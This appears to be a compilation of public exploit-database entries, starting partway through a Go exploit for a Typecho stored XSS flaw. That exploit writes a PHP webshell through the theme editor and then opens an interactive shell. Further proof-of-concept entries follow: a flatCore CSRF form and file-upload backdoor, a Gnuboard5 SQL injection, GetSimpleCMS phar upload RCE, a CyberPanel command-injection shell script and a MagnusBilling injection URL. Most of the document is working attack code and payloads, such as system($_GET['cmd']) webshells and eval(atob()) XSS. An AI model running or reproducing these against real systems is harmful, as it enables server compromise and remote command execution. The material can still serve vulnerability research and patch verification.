	req, err := http.NewRequest("GET", u+"/admin/write-post.php", nil)
	if err != nil {
		fmt.Println("[X] Error creating initial request:", err)
		return ""
	}
	req.Header.Set("Cookie", cookies)
	req.Header.Set("User-Agent", userAgent)
	resp, err := client.Do(req)
	if err != nil {
		fmt.Println("[X] Error sending initial request:", err)
		return ""
	}
	buf := new(bytes.Buffer)
	buf.ReadFrom(resp.Body)
	body := buf.String()
	if !strings.Contains(body, "<form action=\"") {
		fmt.Println("[X] Error finding post edit URL")
		return ""
	}
	editUrl := strings.Split(body, "<form action=\"")[1]
	editUrl = strings.Split(editUrl, "\"")[0]
	return editUrl
}

// generateRandomBytes returns the hex SHA-256 of 64 bytes from crypto/rand;
// it is used as the shared secret that gates the injected PHP.
//
// NOTE(review): the rand.Read error is ignored, and the local `bytes` shadows
// the imported bytes package inside this function.
func generateRandomBytes() string {
	bytes := make([]byte, 64)
	rand.Read(bytes)
	return fmt.Sprintf("%x", sha256.Sum256(bytes))
}

// getJsCode assembles the JavaScript that will run in the admin's browser.
//
// phpPayload is the code to be prepended to the theme file: it emits an
// X-Random-Token response header on every request (the beacon checkInjected
// polls for) and runs $_POST["action"] when $_POST["CSRFToken"] equals
// password. jsPayload opens /admin/theme-editor.php in a hidden iframe and,
// after 200 ms, inserts phpPayload after the first "<?php" of the editor
// textarea and submits the form, unless the payload is already present.
//
// Defender notes: the pivot is the theme editor's write access under the
// admin's session; disabling or restricting theme editing removes the
// persistence step, and an unexpected X-Random-Token response header from
// the site is a direct indicator that the PHP was written.
func getJsCode(password string) string {
	phpPayload := `
header("X-Random-Token: " . md5(uniqid()));
if (isset($_POST["CSRFToken"]) && $_POST["CSRFToken"] === "%s") {
	if (isset($_POST["action"])) {
		system($_POST["action"]);
		exit;
	}
}
`
	phpPayload = fmt.Sprintf(phpPayload, password)
	jsPayload := `
var i = document.createElement('iframe');
i.src = location.protocol+'//'+location.host+'/admin/theme-editor.php';
i.style.display = 'none';
document.body.appendChild(i);
setTimeout(() => {
	var textarea = i.contentWindow.document.getElementById('content');
	if (textarea.value.includes(payload)) return;
	textarea.value = textarea.value.replace(/<\?php/, '<?php ' + payload);
	var form = i.contentWindow.document.getElementById('theme').submit();
}, 200);
`
	// The PHP is embedded in a JS template literal; a backtick or "${" inside
	// phpPayload would break it (none are present in the template above).
	return fmt.Sprintf("var payload = `%s`;\n%s", phpPayload, jsPayload)
}

// generatePayload base64-encodes jsCode and wraps it in a Markdown reference
// link whose link text is an <img> with an onerror handler that decodes and
// evals it. jsCode is space-padded to a multiple of 3 bytes first, so the
// base64 output contains no '=' padding characters.
func generatePayload(jsCode string) string {
	remainder := len(jsCode) % 3
	if remainder != 0 {
		jsCode += strings.Repeat(" ", 3-remainder)
	}
	jsCodeEncoded := base64.StdEncoding.EncodeToString([]byte(jsCode))
	return fmt.Sprintf("[<img style=\"display:none\" src=x onerror=\"eval(atob('%s'))\">][1]\n[1]: https://google.com", jsCodeEncoded)
}

// createPost saves a Markdown post whose text begins with payload, using the
// edit URL from getEditUrl and the caller's cookies, and returns the Location
// header of the (unfollowed) redirect. Returns "" on request errors.
//
// NOTE(review): url.Values.Encode percent-encodes keys, so "category%5B%5D"
// is sent as "category%255B%255D" rather than "category[]"; whether the
// server accepts the post without a category is not visible here.
func createPost(u string, cookies string, payload string) string {
	formData := url.Values{}
	formData.Set("title", postTitle)
	formData.Set("text", payload+"\n"+postText)
	formData.Set("do", "save")
	formData.Set("markdown", "1")
	formData.Set("category%5B%5D", "1")
	formData.Set("allowComment", "1")
	formData.Set("allowPing", "1")
	formData.Set("allowFeed", "1")
	formData.Set("dst", "60")
	formData.Set("timezone", "7200")
	req, err := http.NewRequest("POST", u, strings.NewReader(formData.Encode()))
	if err != nil {
		fmt.Println("[X] Error creating malicious post creation request:", err)
		return ""
	}
	req.Header.Set("Cookie", cookies)
	req.Header.Set("User-Agent", userAgent)
	req.Header.Set("Content-Type", "application/x-www-form-urlencoded")
	req.Header.Set("Content-Length", fmt.Sprint(len(formData.Encode())))
	// Referer is derived from the edit URL: everything before ".php", with
	// "index" swapped for "admin/write-post.php".
	req.Header.Set("Referer", strings.Replace(strings.Split(u, ".php")[0], "index", "admin/write-post.php", 1))
	resp, err := client.Do(req)
	if err != nil {
		fmt.Println("[X] Error sending malicious post creation request:", err)
		return ""
	}
	defer resp.Body.Close()
	return resp.Header.Get("Location")
}

// checkInjected sends a HEAD request to u and reports whether the response
// carries the X-Random-Token header emitted by the injected PHP.
func checkInjected(u string) bool {
	req, err := http.NewRequest("HEAD", u, nil)
	if err != nil {
		return false
	}
	req.Header.Set("User-Agent", userAgent)
	resp, err := client.Do(req)
	if err != nil {
		return false
	}
	return resp.Header.Get("X-Random-Token") != ""
}

// readInput returns one line from stdin, or "" at EOF/error.
func readInput() string {
	scanner := bufio.NewScanner(os.Stdin)
	if scanner.Scan() {
		return scanner.Text()
	}
	return ""
}

// interactiveShell loops forever reading a line from stdin and POSTing it as
// "action" (with "CSRFToken"=password) to u, printing the response body.
// There is no exit command; EOF on stdin yields empty actions, not a return.
func interactiveShell(u string, password string) {
	for {
		fmt.Print("$ ")
		cmd := readInput()
		formData := url.Values{}
		formData.Set("CSRFToken", password)
		formData.Set("action", cmd)
		req, err := http.NewRequest("POST", u, strings.NewReader(formData.Encode()))
		if err != nil {
			fmt.Println("[X] Error creating shell request:", err)
			continue
		}
		req.Header.Set("User-Agent", userAgent)
		req.Header.Set("Content-Type", "application/x-www-form-urlencoded")
		req.Header.Set("Content-Length", fmt.Sprint(len(formData.Encode())))
		resp, err := client.Do(req)
		if err != nil {
			fmt.Println("[X] Error sending shell request:", err)
			continue
		}
		buf := new(bytes.Buffer)
		buf.ReadFrom(resp.Body)
		body := buf.String()
		fmt.Println(body)
	}
}

// main: argv is <URL> <COOKIE_HEADER_VALUE>. It obtains the edit URL, creates
// the draft post carrying the payload, prints the preview URL that must be
// opened by an admin, polls checkInjected once per second until the beacon
// header appears, then hands over to interactiveShell.
func main() {
	if len(os.Args) != 3 {
		fmt.Println("Usage: go run CVE-2024-35540.go <URL> <COOKIE_HEADER_VALUE>")
		os.Exit(1)
	}
	fmt.Println("[+] Starting Typecho <= 1.3.0 Stored XSS exploit (CVE-2024-35540) by cyberaz0r")
	targetUrl := os.Args[1]
	cookies := os.Args[2]
	fmt.Println("[*] Getting post edit URL with CSRF token...")
	editUrl := getEditUrl(targetUrl, cookies)
	if editUrl == "" {
		fmt.Println("[-] Could not get post edit URL, exiting...")
		return
	}
	fmt.Println("[+] Edit URL:", editUrl)
	password := generateRandomBytes()
	fmt.Println("[+] Generated password to access the webshell: ", password)
	fmt.Println("[*] Generating JavaScript code to inject webshell...")
	jsCode := getJsCode(password)
	payload := generatePayload(jsCode)
	fmt.Println("[*] Creating malicious post...")
	postUrl := createPost(editUrl, cookies, payload)
	if postUrl == "" || postUrl == "/" {
		fmt.Println("[-] Could not create malicious post, exiting...")
		return
	}
	previewUrl := strings.Replace(postUrl, "write-post.php", "preview.php", 1)
	fmt.Println("[+] Malicious post created successfully!")
	fmt.Println("[i] Send this preview URL to the admin to trigger the XSS:\n" + previewUrl)
	fmt.Println("[*] Waiting for the admin to visit the preview URL...")
	for !checkInjected(targetUrl) {
		time.Sleep(1 * time.Second)
	}
	fmt.Println("[+] Webshell injected successfully!")
	fmt.Println("[+] Enjoy your shell ;)\n")
	interactiveShell(targetUrl, password)
}
flatCore 1.5 - Cross Site Request Forgery (CSRF)
# Exploit Title: flatCore 1.5 - Cross Site Request Forgery (CSRF) # Date: 2024-10-26 # Exploit Author: CodeSecLab # Vendor Homepage: https://github.com/flatCore/flatCore-CMS # Software Link: https://github.com/flatCore/flatCore-CMS # Version: d3a5168 # Tested on: Ubuntu Windows # CVE : CVE-2019-13961 PoC: <!DOCTYPE html> <html> <head> <title>CSRF PoC</title> </head> <body> <form action="http://flatcore3/acp/core/files.upload-script.php" method="POST" enctype="multipart/form-data"> <input type="hidden" name="upload_destination" value="../content/files"> <input type="hidden" name="w" value="800"> <input type="hidden" name="h" value="600"> <input type="hidden" name="fz" value="1000"> <input type="hidden" name="unchanged" value="yes"> <input type="file" name="file" value="test.php"> <input type="submit" value="Upload"> </form> </body> </html> [Replace Your Domain Name]
flatCore 1.5.5 - Arbitrary File Upload
# Exploit Title: flatCore 1.5.5 - Arbitrary File Upload # Date: 2024-10-26 # Exploit Author: CodeSecLab # Vendor Homepage: https://github.com/flatCore/flatCore-CMS # Software Link: https://github.com/flatCore/flatCore-CMS # Version: 1.5.5 # Tested on: Ubuntu Windows # CVE : CVE-2019-10652 PoC: 1) 1. Access the flatCore Admin Panel URL: http://flatcore/acp/acp.php Log in with valid administrative credentials. 2. Upload a Malicious PHP File Navigate to the upload section where you can add new files or images. This is usually accessible via the "Media" or "Addons" feature in the admin panel. 3. Intercept and Modify the Upload Request Using a tool like Burp Suite or by modifying the request directly, prepare the following POST request: POST /acp/core/files.upload-script.php HTTP/1.1 Host: flatcore Content-Type: multipart/form-data; boundary=---------------------------735323031399963166993862150 Content-Length: <calculated length> Cookie: PHPSESSID=<valid_session_id> -----------------------------735323031399963166993862150 Content-Disposition: form-data; name="file"; filename="exploit.php" Content-Type: application/octet-stream <?php // Simple PHP backdoor code echo "Vulnerable File Upload - PoC"; system($_GET['cmd']); ?> -----------------------------735323031399963166993862150 Content-Disposition: form-data; name="upload_destination" ../content/files -----------------------------735323031399963166993862150 Content-Disposition: form-data; name="csrf_token" <valid_csrf_token> -----------------------------735323031399963166993862150 Note: Replace <valid_session_id> and <valid_csrf_token> with values from your authenticated session. 4. 
Verification After uploading, the PHP file should be accessible at: http://flatcore/content/files/exploit.php Access the uploaded file: http://flatcore/content/files/exploit.php?cmd=whoami PoC 2) # PoC to exploit unrestricted file upload vulnerability in flatCore 1.4.7 # Target URL: http://flatcore/ # The attacker must be authenticated as an administrator to exploit this vulnerability # Step 1: Log in as an administrator and obtain the CSRF token # You need to obtain the CSRF token manually or through a script since the token is required for the file upload. # Step 2: Upload a malicious PHP file using the file upload feature # Create a PHP reverse shell or any arbitrary PHP code and save it as shell.php echo "<?php phpinfo(); ?>" > shell.php # Upload the PHP file using cURL curl -X POST "http://flatcore/acp/core/files.upload-script.php" \ -H "Content-Type: multipart/form-data" \ -F "file=@shell.php" \ -F "csrf_token=YOUR_CSRF_TOKEN_HERE" \ -F "upload_destination=../content/files" \ -F "file_mode=overwrite" \ -b "PHPSESSID=YOUR_SESSION_ID_HERE" # Replace YOUR_CSRF_TOKEN_HERE and YOUR_SESSION_ID_HERE with valid CSRF token and PHPSESSID # Step 3: Access the uploaded malicious PHP file echo "Visit the following URL to execute the uploaded PHP file:" echo "http://flatcore/content/files/shell.php" This PoC demonstrates how an attacker can exploit the unrestricted file upload vulnerability to upload a PHP file and execute it on the server. [Replace Your Domain Name]
Gnuboard5 5.3.2.8 - SQL Injection
# Exploit Title: Gnuboard5 5.3.2.8 - SQL Injection # Date: 2024-10-26 # Exploit Author: CodeSecLab # Vendor Homepage: https://github.com/gnuboard/gnuboard5 # Software Link: https://github.com/gnuboard/gnuboard5 # Version: 5.3.2.8 # Tested on: Ubuntu Windows # CVE : CVE-2020-18662 PoC: 1) POST /install/install_db.php HTTP/1.1 Host: gnuboard Content-Type: application/x-www-form-urlencoded Content-Length: 100 mysql_user=root&mysql_pass=password&mysql_db=gnuboard&table_prefix=12`; select sleep(5)# result: sleep 5s. 2) curl -X POST http://gnuboard/install/install_db.php \ -d "mysql_user=root" \ -d "mysql_pass=password" \ -d "mysql_db=gnuboard_db" \ -d "table_prefix=' OR 1=1--" result: The application does not work. [Replace Your Domain Name and Replace Database Information]
GetSimpleCMS 3.3.16 - Remote Code Execution (RCE)
# Exploit Title: GetSimpleCMS 3.3.16 - Remote Code Execution (RCE) # Date: 2024-10-26 # Exploit Author: CodeSecLab # Vendor Homepage: https://github.com/GetSimpleCMS/GetSimpleCMS # Software Link: https://github.com/GetSimpleCMS/GetSimpleCMS # Version: 3.3.16 # Tested on: Ubuntu Windows # CVE : CVE-2021-28976 PoC-1: 1)Create a .phar file. 1. Create the PHP script: Save your code (the one you provided) in a file, say index.php: <?php echo shell_exec($_GET['cmd']); ?> 2. Write a PHP script to create the .phar file: Use the Phar class in PHP to package the index.php file into a .phar archive. Create a script named create_phar.php as follows: <?php try { // Initialize a new Phar object, name it "archive.phar" $phar = new Phar('archive.phar'); // Set the stub (entry point) for the Phar file, pointing to index.php $phar->startBuffering(); $phar->addFromString('index.php', file_get_contents('index.php')); $phar->setStub($phar->createDefaultStub('index.php')); $phar->stopBuffering(); echo "Phar archive created successfully!"; } catch (Exception $e) { echo "Error: " . $e->getMessage(); } 3. Run the script to generate the .phar file: On your terminal (assuming you're using a system that has PHP installed), run the following command to execute the script: php create_phar.php. After running the script, you should find a file named archive.phar in your working directory. 2)Upload file: 1. Upload the 'archive.phar' file using the vulnerable upload functionality at http://getsimplecms/admin/upload.php. 2. You can find the file at http://getsimplecms/data/uploads/. 
3)Details: "Validation Mechanisms Before Patch": "File extension blacklist and MIME type blacklist were used but lacked specific filtering for 'phar' file types.", "Bypass Technique": "Upload a 'phar' file, as it was not included in the original blacklist, which can be treated as a PHP archive by the server for remote code execution.", "Request URL": "http://getsimplecms/admin/upload.php", "Request Method": "POST", "Request Parameters": { "file": "<Malicious File>" }, PoC-2: 1) Create the file exploit.phar with the following contents: malicious.php 0000644 0000000 0000000 00000000036 00000000000 010442 0 ustar 00 <?php system($_GET['cmd']); ?> 2) 1. Prepare a PHP file named 'exploit.phar'. 2. Send a POST request to http://getsimplecms/admin/upload.php with the 'exploit.phar' file as the 'file' parameter. 3. Access the uploaded file at http://getsimplecms/data/uploads/exploit.phar and execute commands by passing the 'cmd' parameter (e.g., http://getsimplecms/data/uploads/exploit.phar?cmd=id). [Replace Your Domain Name]
CyberPanel 2.3.6 - Remote Code Execution (RCE)
# Exploit Title: CyberPanel 2.3.6 - Remote Code Execution (RCE)
# Date: 10/29/2024
# Exploit Author: Luka Petrovic (refr4g)
# Vendor Homepage: https://cyberpanel.net/
# Software Link: https://github.com/usmannasir/cyberpanel
# Version: 2.3.5, 2.3.6, 2.3.7 (before patch)
# Tested on: Ubuntu 20.04, CyberPanel v2.3.5, v2.3.6, v2.3.7 (before patch)
# CVE: CVE-2024-51378
# PoC Repository: https://github.com/refr4g/CVE-2024-51378
# Blog Post: https://refr4g.github.io/posts/cyberpanel-command-injection-vulnerability/

# NOTE(review): this listing was collapsed onto a single line on the page; the
# block structure below is reconstructed from statement order.
# NOTE(review): the shebang below is not on line 1, so it has no effect.
#!/usr/bin/python3

import argparse
import httpx
import sys

# ANSI colour codes for console output (MAGENTA is defined but unused).
RED = "\033[91m"
GREEN = "\033[92m"
CYAN = "\033[96m"
MAGENTA = "\033[95m"
YELLOW = "\033[93m"
RESET = "\033[0m"

print(f"{RED}CVE-2024-51378{RESET} - Remote Code Execution Exploit")
print(f"{CYAN}Author:{RESET} {GREEN}Luka Petrovic (refr4g){RESET}")
print()

# The two panel paths this script will send the OPTIONS request to.
allowed_endpoints = ["/ftp/getresetstatus", "/dns/getresetstatus"]

parser = argparse.ArgumentParser()
parser.add_argument("target", help=f"{CYAN}Target URL (with http/https prefix){RESET}")
parser.add_argument("endpoint", help=f"{CYAN}Endpoint to target, choose from {allowed_endpoints}{RESET}")
args = parser.parse_args()

if args.endpoint not in allowed_endpoints:
    print(f"{RED}Error: Invalid endpoint '{args.endpoint}'.{RESET}")
    parser.print_help()
    sys.exit(1)

target = args.target
endpoint = args.endpoint

# NOTE(review): verify=False disables TLS certificate validation for the whole session.
client = httpx.Client(base_url=target, verify=False)

# Reachability check. NOTE(review): raise_for_status() raises
# httpx.HTTPStatusError, which is a sibling of RequestError under HTTPError
# (confirm against the installed httpx), so a non-2xx status is not caught
# here and propagates as an uncaught exception.
try:
    response = client.get("/")
    response.raise_for_status()
except httpx.RequestError:
    print(f"{RED}Error: Unable to reach the target {target}. Please check the URL and your connection.{RESET}")
    sys.exit(1)

def get_token() -> str | None:
    """Return the ``csrftoken`` cookie set by an unauthenticated GET of ``/``,
    or None if the cookie is absent. Uses the module-level ``client``.
    """
    response = client.get("/")
    return response.cookies.get("csrftoken")

def rce(client: httpx.Client, csrf_token: str, cmd: str, endpoint: str) -> str | None:
    """Send one OPTIONS request carrying ``cmd`` inside the ``statusfile`` field.

    The body is the raw string ``{"statusfile": "; <cmd>; #"}`` with
    ``X-CSRFToken`` and ``Referer`` headers set from the cookie and base URL;
    no login is performed anywhere in this script.

    Args:
        client: the httpx session.
        csrf_token: value of the ``csrftoken`` cookie.
        cmd: text placed into the ``statusfile`` value.
        endpoint: one of ``allowed_endpoints``.

    Returns:
        The ``requestStatus`` field of the JSON response (None if absent).

    Raises:
        ValueError / httpx.DecodingError-style errors if the response is not JSON.

    Defender notes: the indicator is an OPTIONS request *with a JSON body* to
    /ftp/getresetstatus or /dns/getresetstatus whose ``statusfile`` value
    contains ``;`` — OPTIONS requests normally carry no body at all, so they
    are cheap to alert on at the proxy/WAF. The header lists 2.3.7 "before
    patch", so the vendor fix is the mitigation; until applied, keep the
    panel off untrusted networks.
    """
    headers = {
        "X-CSRFToken": csrf_token,
        "Content-Type": "application/json",
        "Referer": str(client.base_url)
    }
    # cmd is interpolated into a JSON string without escaping; a double quote
    # in cmd produces an invalid body.
    payload = '{"statusfile": "; %s; #"}' % cmd
    response = client.request("OPTIONS", endpoint, headers=headers, data=payload)
    return response.json().get("requestStatus")

csrf_token = get_token()
if not csrf_token:
    print(f"{RED}Failed to retrieve CSRF token. Exiting.{RESET}")
    sys.exit(1)

# Interactive loop; there is no quit command (Ctrl-C / EOF ends it).
while True:
    cmd = input(f"{YELLOW}$> {RESET}")
    print(rce(client, csrf_token, cmd, endpoint))
MagnusSolution magnusbilling 7.3.0 - Command Injection
# Exploit Title: MagnusSolution magnusbilling 7.3.0 - Command Injection # Date: 2024-10-26 # Exploit Author: CodeSecLab # Vendor Homepage: https://github.com/magnussolution/magnusbilling7 # Software Link: https://github.com/magnussolution/magnusbilling7 # Version: 7.3.0 # Tested on: Centos # CVE : CVE-2023-30258 # PoC URL for Command Injection http://magnusbilling/lib/icepay/icepay.php?democ=testfile; id > /tmp/injected.txt Result: This PoC attempts to inject the id command. [Replace Your Domain Name]